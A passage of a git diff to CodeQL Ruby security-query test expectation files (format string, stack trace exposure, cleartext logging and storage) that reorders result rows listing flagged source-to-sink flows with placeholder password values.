...[...] | tainted_format_string.rb:19:30:19:35 | call to params | tainted_format_string.rb:19:30:19:44 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:19:30:19:35 | call to params | user-provided value | +| tainted_format_string.rb:21:27:21:41 | ...[...] | tainted_format_string.rb:21:27:21:32 | call to params | tainted_format_string.rb:21:27:21:41 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:21:27:21:32 | call to params | user-provided value | +| tainted_format_string.rb:22:20:22:34 | ...[...] | tainted_format_string.rb:22:20:22:25 | call to params | tainted_format_string.rb:22:20:22:34 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:22:20:22:25 | call to params | user-provided value | +| tainted_format_string.rb:28:19:28:33 | ...[...] | tainted_format_string.rb:28:19:28:24 | call to params | tainted_format_string.rb:28:19:28:33 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:28:19:28:24 | call to params | user-provided value | +| tainted_format_string.rb:33:12:33:46 | ... + ... | tainted_format_string.rb:33:32:33:37 | call to params | tainted_format_string.rb:33:12:33:46 | ... + ... | Format string depends on a $@. | tainted_format_string.rb:33:32:33:37 | call to params | user-provided value | +| tainted_format_string.rb:36:12:36:46 | "A log message: #{...}" | tainted_format_string.rb:36:30:36:35 | call to params | tainted_format_string.rb:36:12:36:46 | "A log message: #{...}" | Format string depends on a $@. | tainted_format_string.rb:36:30:36:35 | call to params | user-provided value | +| tainted_format_string.rb:39:5:39:45 | "A log message #{...} %{foo}" | tainted_format_string.rb:39:22:39:27 | call to params | tainted_format_string.rb:39:5:39:45 | "A log message #{...} %{foo}" | Format string depends on a $@. | tainted_format_string.rb:39:22:39:27 | call to params | user-provided value | +| tainted_format_string.rb:42:5:42:43 | "A log message #{...} %08x" | tainted_format_string.rb:42:22:42:27 | call to params | tainted_format_string.rb:42:5:42:43 | "A log message #{...} %08x" | Format string depends on a $@. | tainted_format_string.rb:42:22:42:27 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-209/StackTraceExposure.expected b/ruby/ql/test/query-tests/security/cwe-209/StackTraceExposure.expected index 24404e8f1a9f..00e0b4317de2 100644 --- a/ruby/ql/test/query-tests/security/cwe-209/StackTraceExposure.expected +++ b/ruby/ql/test/query-tests/security/cwe-209/StackTraceExposure.expected @@ -1,7 +1,3 @@ -#select -| StackTraceExposure.rb:6:18:6:28 | call to backtrace | StackTraceExposure.rb:6:18:6:28 | call to backtrace | StackTraceExposure.rb:6:18:6:28 | call to backtrace | $@ can be exposed to an external user. | StackTraceExposure.rb:6:18:6:28 | call to backtrace | Error information | -| StackTraceExposure.rb:12:18:12:19 | bt | StackTraceExposure.rb:11:10:11:17 | call to caller | StackTraceExposure.rb:12:18:12:19 | bt | $@ can be exposed to an external user. | StackTraceExposure.rb:11:10:11:17 | call to caller | Error information | -| StackTraceExposure.rb:18:18:18:28 | call to backtrace | StackTraceExposure.rb:18:18:18:28 | call to backtrace | StackTraceExposure.rb:18:18:18:28 | call to backtrace | $@ can be exposed to an external user. | StackTraceExposure.rb:18:18:18:28 | call to backtrace | Error information | edges | StackTraceExposure.rb:11:5:11:6 | bt | StackTraceExposure.rb:12:18:12:19 | bt | provenance | | | StackTraceExposure.rb:11:10:11:17 | call to caller | StackTraceExposure.rb:11:5:11:6 | bt | provenance | | @@ -12,3 +8,7 @@ nodes | StackTraceExposure.rb:12:18:12:19 | bt | semmle.label | bt | | StackTraceExposure.rb:18:18:18:28 | call to backtrace | semmle.label | call to backtrace | subpaths +#select +| StackTraceExposure.rb:6:18:6:28 | call to backtrace | StackTraceExposure.rb:6:18:6:28 | call to backtrace | StackTraceExposure.rb:6:18:6:28 | call to backtrace | $@ can be exposed to an external user. | StackTraceExposure.rb:6:18:6:28 | call to backtrace | Error information | +| StackTraceExposure.rb:12:18:12:19 | bt | StackTraceExposure.rb:11:10:11:17 | call to caller | StackTraceExposure.rb:12:18:12:19 | bt | $@ can be exposed to an external user. | StackTraceExposure.rb:11:10:11:17 | call to caller | Error information | +| StackTraceExposure.rb:18:18:18:28 | call to backtrace | StackTraceExposure.rb:18:18:18:28 | call to backtrace | StackTraceExposure.rb:18:18:18:28 | call to backtrace | $@ can be exposed to an external user. | StackTraceExposure.rb:18:18:18:28 | call to backtrace | Error information | diff --git a/ruby/ql/test/query-tests/security/cwe-312/CleartextLogging.expected b/ruby/ql/test/query-tests/security/cwe-312/CleartextLogging.expected index ae87773dd0e8..7c2d4d259e33 100644 --- a/ruby/ql/test/query-tests/security/cwe-312/CleartextLogging.expected +++ b/ruby/ql/test/query-tests/security/cwe-312/CleartextLogging.expected @@ -1,26 +1,3 @@ -#select -| logging.rb:6:20:6:27 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:6:20:6:27 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:8:21:8:28 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:8:21:8:28 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:10:21:10:28 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:10:21:10:28 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:12:21:12:28 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:12:21:12:28 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:14:23:14:30 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:14:23:14:30 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:16:20:16:27 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:16:20:16:27 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:19:33:19:40 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:19:33:19:40 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:21:44:21:51 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:21:44:21:51 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:23:33:23:40 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:23:33:23:40 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:26:18:26:34 | "pw: #{...}" | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:26:18:26:34 | "pw: #{...}" | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:28:26:28:33 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:28:26:28:33 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:38:20:38:34 | ...[...] | logging.rb:30:20:30:53 | "aec5058e61f7f122998b1a30ee2c66b6" : String | logging.rb:38:20:38:34 | ...[...] | This logs sensitive data returned by $@ as clear text. | logging.rb:30:20:30:53 | "aec5058e61f7f122998b1a30ee2c66b6" | a write to password | -| logging.rb:40:20:40:34 | ...[...] | logging.rb:34:19:34:52 | "beeda625d7306b45784d91ea0336e201" : String | logging.rb:40:20:40:34 | ...[...] | This logs sensitive data returned by $@ as clear text. | logging.rb:34:19:34:52 | "beeda625d7306b45784d91ea0336e201" | a write to password | -| logging.rb:42:20:42:34 | ...[...] | logging.rb:34:19:34:52 | "beeda625d7306b45784d91ea0336e201" : String | logging.rb:42:20:42:34 | ...[...] | This logs sensitive data returned by $@ as clear text. | logging.rb:34:19:34:52 | "beeda625d7306b45784d91ea0336e201" | a write to password | -| logging.rb:74:20:74:50 | password_masked_ineffective_sub | logging.rb:64:35:64:68 | "ca497451f5e883662fb1a37bc9ec7838" : String | logging.rb:74:20:74:50 | password_masked_ineffective_sub | This logs sensitive data returned by $@ as clear text. | logging.rb:64:35:64:68 | "ca497451f5e883662fb1a37bc9ec7838" | an assignment to password_masked_ineffective_sub | -| logging.rb:74:20:74:50 | password_masked_ineffective_sub | logging.rb:68:35:68:88 | call to sub | logging.rb:74:20:74:50 | password_masked_ineffective_sub | This logs sensitive data returned by $@ as clear text. | logging.rb:68:35:68:88 | call to sub | an assignment to password_masked_ineffective_sub | -| logging.rb:76:20:76:51 | password_masked_ineffective_gsub | logging.rb:66:36:66:69 | "a7e3747b19930d4f4b8181047194832f" : String | logging.rb:76:20:76:51 | password_masked_ineffective_gsub | This logs sensitive data returned by $@ as clear text. | logging.rb:66:36:66:69 | "a7e3747b19930d4f4b8181047194832f" | an assignment to password_masked_ineffective_gsub | -| logging.rb:76:20:76:51 | password_masked_ineffective_gsub | logging.rb:70:36:70:86 | call to gsub | logging.rb:76:20:76:51 | password_masked_ineffective_gsub | This logs sensitive data returned by $@ as clear text. | logging.rb:70:36:70:86 | call to gsub | an assignment to password_masked_ineffective_gsub | -| logging.rb:78:20:78:53 | password_masked_ineffective_sub_ex | logging.rb:65:38:65:71 | "ca497451f5e883662fb1a37bc9ec7838" : String | logging.rb:78:20:78:53 | password_masked_ineffective_sub_ex | This logs sensitive data returned by $@ as clear text. | logging.rb:65:38:65:71 | "ca497451f5e883662fb1a37bc9ec7838" | an assignment to password_masked_ineffective_sub_ex | -| logging.rb:80:20:80:54 | password_masked_ineffective_gsub_ex | logging.rb:67:39:67:72 | "a7e3747b19930d4f4b8181047194832f" : String | logging.rb:80:20:80:54 | password_masked_ineffective_gsub_ex | This logs sensitive data returned by $@ as clear text. | logging.rb:67:39:67:72 | "a7e3747b19930d4f4b8181047194832f" | an assignment to password_masked_ineffective_gsub_ex | -| logging.rb:84:15:84:22 | password | logging.rb:84:15:84:22 | password | logging.rb:84:15:84:22 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:84:15:84:22 | password | a parameter password | -| logging.rb:84:15:84:22 | password | logging.rb:87:16:87:49 | "65f2950df2f0e2c38d7ba2ccca767291" : String | logging.rb:84:15:84:22 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:87:16:87:49 | "65f2950df2f0e2c38d7ba2ccca767291" | an assignment to password_arg | edges | logging.rb:3:1:3:8 | password : String | logging.rb:6:20:6:27 | password | provenance | | | logging.rb:3:1:3:8 | password : String | logging.rb:8:21:8:28 | password | provenance | | @@ -112,3 +89,26 @@ nodes | logging.rb:87:16:87:49 | "65f2950df2f0e2c38d7ba2ccca767291" : String | semmle.label | "65f2950df2f0e2c38d7ba2ccca767291" : String | | logging.rb:88:5:88:16 | password_arg : String | semmle.label | password_arg : String | subpaths +#select +| logging.rb:6:20:6:27 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:6:20:6:27 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:8:21:8:28 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:8:21:8:28 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:10:21:10:28 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:10:21:10:28 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:12:21:12:28 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:12:21:12:28 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:14:23:14:30 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:14:23:14:30 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:16:20:16:27 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:16:20:16:27 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:19:33:19:40 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:19:33:19:40 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:21:44:21:51 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:21:44:21:51 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:23:33:23:40 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:23:33:23:40 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:26:18:26:34 | "pw: #{...}" | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:26:18:26:34 | "pw: #{...}" | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:28:26:28:33 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:28:26:28:33 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:38:20:38:34 | ...[...] | logging.rb:30:20:30:53 | "aec5058e61f7f122998b1a30ee2c66b6" : String | logging.rb:38:20:38:34 | ...[...] | This logs sensitive data returned by $@ as clear text. | logging.rb:30:20:30:53 | "aec5058e61f7f122998b1a30ee2c66b6" | a write to password | +| logging.rb:40:20:40:34 | ...[...] | logging.rb:34:19:34:52 | "beeda625d7306b45784d91ea0336e201" : String | logging.rb:40:20:40:34 | ...[...] | This logs sensitive data returned by $@ as clear text. | logging.rb:34:19:34:52 | "beeda625d7306b45784d91ea0336e201" | a write to password | +| logging.rb:42:20:42:34 | ...[...] | logging.rb:34:19:34:52 | "beeda625d7306b45784d91ea0336e201" : String | logging.rb:42:20:42:34 | ...[...] | This logs sensitive data returned by $@ as clear text. | logging.rb:34:19:34:52 | "beeda625d7306b45784d91ea0336e201" | a write to password | +| logging.rb:74:20:74:50 | password_masked_ineffective_sub | logging.rb:64:35:64:68 | "ca497451f5e883662fb1a37bc9ec7838" : String | logging.rb:74:20:74:50 | password_masked_ineffective_sub | This logs sensitive data returned by $@ as clear text. | logging.rb:64:35:64:68 | "ca497451f5e883662fb1a37bc9ec7838" | an assignment to password_masked_ineffective_sub | +| logging.rb:74:20:74:50 | password_masked_ineffective_sub | logging.rb:68:35:68:88 | call to sub | logging.rb:74:20:74:50 | password_masked_ineffective_sub | This logs sensitive data returned by $@ as clear text. | logging.rb:68:35:68:88 | call to sub | an assignment to password_masked_ineffective_sub | +| logging.rb:76:20:76:51 | password_masked_ineffective_gsub | logging.rb:66:36:66:69 | "a7e3747b19930d4f4b8181047194832f" : String | logging.rb:76:20:76:51 | password_masked_ineffective_gsub | This logs sensitive data returned by $@ as clear text. | logging.rb:66:36:66:69 | "a7e3747b19930d4f4b8181047194832f" | an assignment to password_masked_ineffective_gsub | +| logging.rb:76:20:76:51 | password_masked_ineffective_gsub | logging.rb:70:36:70:86 | call to gsub | logging.rb:76:20:76:51 | password_masked_ineffective_gsub | This logs sensitive data returned by $@ as clear text. | logging.rb:70:36:70:86 | call to gsub | an assignment to password_masked_ineffective_gsub | +| logging.rb:78:20:78:53 | password_masked_ineffective_sub_ex | logging.rb:65:38:65:71 | "ca497451f5e883662fb1a37bc9ec7838" : String | logging.rb:78:20:78:53 | password_masked_ineffective_sub_ex | This logs sensitive data returned by $@ as clear text. | logging.rb:65:38:65:71 | "ca497451f5e883662fb1a37bc9ec7838" | an assignment to password_masked_ineffective_sub_ex | +| logging.rb:80:20:80:54 | password_masked_ineffective_gsub_ex | logging.rb:67:39:67:72 | "a7e3747b19930d4f4b8181047194832f" : String | logging.rb:80:20:80:54 | password_masked_ineffective_gsub_ex | This logs sensitive data returned by $@ as clear text. | logging.rb:67:39:67:72 | "a7e3747b19930d4f4b8181047194832f" | an assignment to password_masked_ineffective_gsub_ex | +| logging.rb:84:15:84:22 | password | logging.rb:84:15:84:22 | password | logging.rb:84:15:84:22 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:84:15:84:22 | password | a parameter password | +| logging.rb:84:15:84:22 | password | logging.rb:87:16:87:49 | "65f2950df2f0e2c38d7ba2ccca767291" : String | logging.rb:84:15:84:22 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:87:16:87:49 | "65f2950df2f0e2c38d7ba2ccca767291" | an assignment to password_arg | diff --git a/ruby/ql/test/query-tests/security/cwe-312/CleartextStorage.expected b/ruby/ql/test/query-tests/security/cwe-312/CleartextStorage.expected index 76b6520fbdb1..2a1c5c564652 100644 --- a/ruby/ql/test/query-tests/security/cwe-312/CleartextStorage.expected +++ b/ruby/ql/test/query-tests/security/cwe-312/CleartextStorage.expected @@ -1,32 +1,3 @@ -#select -| app/controllers/users_controller.rb:5:39:5:50 | new_password | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" : String | app/controllers/users_controller.rb:5:39:5:50 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" | an assignment to new_password | -| app/controllers/users_controller.rb:7:41:7:52 | new_password | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" : String | app/controllers/users_controller.rb:7:41:7:52 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" | an assignment to new_password | -| app/controllers/users_controller.rb:7:41:7:52 | new_password | app/controllers/users_controller.rb:7:41:7:52 | new_password | app/controllers/users_controller.rb:7:41:7:52 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:7:41:7:52 | new_password | a write to password | -| app/controllers/users_controller.rb:13:42:13:53 | new_password | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" : String | app/controllers/users_controller.rb:13:42:13:53 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | an assignment to new_password | -| app/controllers/users_controller.rb:15:49:15:60 | new_password | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" : String | app/controllers/users_controller.rb:15:49:15:60 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | an assignment to new_password | -| app/controllers/users_controller.rb:15:49:15:60 | new_password | app/controllers/users_controller.rb:15:49:15:60 | new_password | app/controllers/users_controller.rb:15:49:15:60 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:15:49:15:60 | new_password | a write to password | -| app/controllers/users_controller.rb:15:87:15:98 | new_password | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" : String | app/controllers/users_controller.rb:15:87:15:98 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | an assignment to new_password | -| app/controllers/users_controller.rb:15:87:15:98 | new_password | app/controllers/users_controller.rb:15:49:15:60 | new_password | app/controllers/users_controller.rb:15:87:15:98 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:15:49:15:60 | new_password | a write to password | -| app/controllers/users_controller.rb:15:87:15:98 | new_password | app/controllers/users_controller.rb:15:87:15:98 | new_password | app/controllers/users_controller.rb:15:87:15:98 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:15:87:15:98 | new_password | a write to password | -| app/controllers/users_controller.rb:21:45:21:56 | new_password | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" : String | app/controllers/users_controller.rb:21:45:21:56 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" | an assignment to new_password | -| app/controllers/users_controller.rb:21:45:21:56 | new_password | app/controllers/users_controller.rb:21:45:21:56 | new_password | app/controllers/users_controller.rb:21:45:21:56 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:21:45:21:56 | new_password | a write to password | -| app/controllers/users_controller.rb:21:83:21:94 | new_password | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" : String | app/controllers/users_controller.rb:21:83:21:94 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" | an assignment to new_password | -| app/controllers/users_controller.rb:21:83:21:94 | new_password | app/controllers/users_controller.rb:21:45:21:56 | new_password | app/controllers/users_controller.rb:21:83:21:94 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:21:45:21:56 | new_password | a write to password | -| app/controllers/users_controller.rb:21:83:21:94 | new_password | app/controllers/users_controller.rb:21:83:21:94 | new_password | app/controllers/users_controller.rb:21:83:21:94 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:21:83:21:94 | new_password | a write to password | -| app/controllers/users_controller.rb:28:27:28:38 | new_password | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" : String | app/controllers/users_controller.rb:28:27:28:38 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" | an assignment to new_password | -| app/controllers/users_controller.rb:30:28:30:39 | new_password | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" : String | app/controllers/users_controller.rb:30:28:30:39 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" | an assignment to new_password | -| app/controllers/users_controller.rb:30:28:30:39 | new_password | app/controllers/users_controller.rb:30:28:30:39 | new_password | app/controllers/users_controller.rb:30:28:30:39 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:30:28:30:39 | new_password | a write to password | -| app/controllers/users_controller.rb:37:39:37:50 | new_password | app/controllers/users_controller.rb:35:20:35:53 | "ff295f8648a406c37fbe378377320e4c" : String | app/controllers/users_controller.rb:37:39:37:50 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:35:20:35:53 | "ff295f8648a406c37fbe378377320e4c" | an assignment to new_password | -| app/controllers/users_controller.rb:44:21:44:32 | new_password | app/controllers/users_controller.rb:42:20:42:53 | "78ffbec583b546bd073efd898f833184" : String | app/controllers/users_controller.rb:44:21:44:32 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:42:20:42:53 | "78ffbec583b546bd073efd898f833184" | an assignment to new_password | -| app/controllers/users_controller.rb:61:25:61:53 | "password: #{...}\\n" | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" : String | app/controllers/users_controller.rb:61:25:61:53 | "password: #{...}\\n" | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" | an assignment to new_password | -| app/controllers/users_controller.rb:64:35:64:61 | "password: #{...}" | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" : String | app/controllers/users_controller.rb:64:35:64:61 | "password: #{...}" | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" | an assignment to new_password | -| app/controllers/users_controller.rb:87:20:87:22 | inf | app/controllers/users_controller.rb:79:19:79:30 | "aaaaaaaaaa" : String | app/controllers/users_controller.rb:87:20:87:22 | inf | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:79:19:79:30 | "aaaaaaaaaa" | a write to password | -| app/controllers/users_controller.rb:87:20:87:22 | inf | app/controllers/users_controller.rb:80:29:80:49 | "0000-0000-0000-0000" : String | app/controllers/users_controller.rb:87:20:87:22 | inf | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:80:29:80:49 | "0000-0000-0000-0000" | a write to credit_card_number | -| app/controllers/users_controller.rb:87:20:87:22 | inf | app/controllers/users_controller.rb:81:14:81:27 | "000-00-00000" : String | app/controllers/users_controller.rb:87:20:87:22 | inf | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:81:14:81:27 | "000-00-00000" | a write to SSN | -| app/controllers/users_controller.rb:87:20:87:22 | inf | app/controllers/users_controller.rb:83:30:83:38 | "bbbbbbb" : String | app/controllers/users_controller.rb:87:20:87:22 | inf | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:83:30:83:38 | "bbbbbbb" | a write to password | -| app/models/user.rb:5:27:5:38 | new_password | app/models/user.rb:3:20:3:53 | "06c38c6a8a9c11a9d3b209a3193047b4" : String | app/models/user.rb:5:27:5:38 | new_password | This stores sensitive data returned by $@ as clear text. | app/models/user.rb:3:20:3:53 | "06c38c6a8a9c11a9d3b209a3193047b4" | an assignment to new_password | -| app/models/user.rb:11:22:11:33 | new_password | app/models/user.rb:9:20:9:53 | "52652fb5c709fb6b9b5a0194af7c6067" : String | app/models/user.rb:11:22:11:33 | new_password | This stores sensitive data returned by $@ as clear text. | app/models/user.rb:9:20:9:53 | "52652fb5c709fb6b9b5a0194af7c6067" | an assignment to new_password | -| app/models/user.rb:17:21:17:32 | new_password | app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" : String | app/models/user.rb:17:21:17:32 | new_password | This stores sensitive data returned by $@ as clear text. | app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" | an assignment to new_password | edges | app/controllers/users_controller.rb:3:5:3:16 | new_password : String | app/controllers/users_controller.rb:5:39:5:50 | new_password | provenance | | | app/controllers/users_controller.rb:3:5:3:16 | new_password : String | app/controllers/users_controller.rb:7:41:7:52 | new_password | provenance | | @@ -149,3 +120,32 @@ nodes | app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" : String | semmle.label | "f982bf2531c149a8a1444a951b12e830" : String | | app/models/user.rb:17:21:17:32 | new_password | semmle.label | new_password | subpaths +#select +| app/controllers/users_controller.rb:5:39:5:50 | new_password | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" : String | app/controllers/users_controller.rb:5:39:5:50 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" | an assignment to new_password | +| app/controllers/users_controller.rb:7:41:7:52 | new_password | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" : String | app/controllers/users_controller.rb:7:41:7:52 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" | an assignment to new_password | +| app/controllers/users_controller.rb:7:41:7:52 | new_password | app/controllers/users_controller.rb:7:41:7:52 | new_password | app/controllers/users_controller.rb:7:41:7:52 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:7:41:7:52 | new_password | a write to password | +| app/controllers/users_controller.rb:13:42:13:53 | new_password | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" : String | app/controllers/users_controller.rb:13:42:13:53 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | an assignment to new_password | +| app/controllers/users_controller.rb:15:49:15:60 | new_password | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" : String | app/controllers/users_controller.rb:15:49:15:60 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | an assignment to new_password | +| app/controllers/users_controller.rb:15:49:15:60 | new_password | app/controllers/users_controller.rb:15:49:15:60 | new_password | app/controllers/users_controller.rb:15:49:15:60 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:15:49:15:60 | new_password | a write to password | +| app/controllers/users_controller.rb:15:87:15:98 | new_password | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" : String | app/controllers/users_controller.rb:15:87:15:98 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:11:20:11:53 | 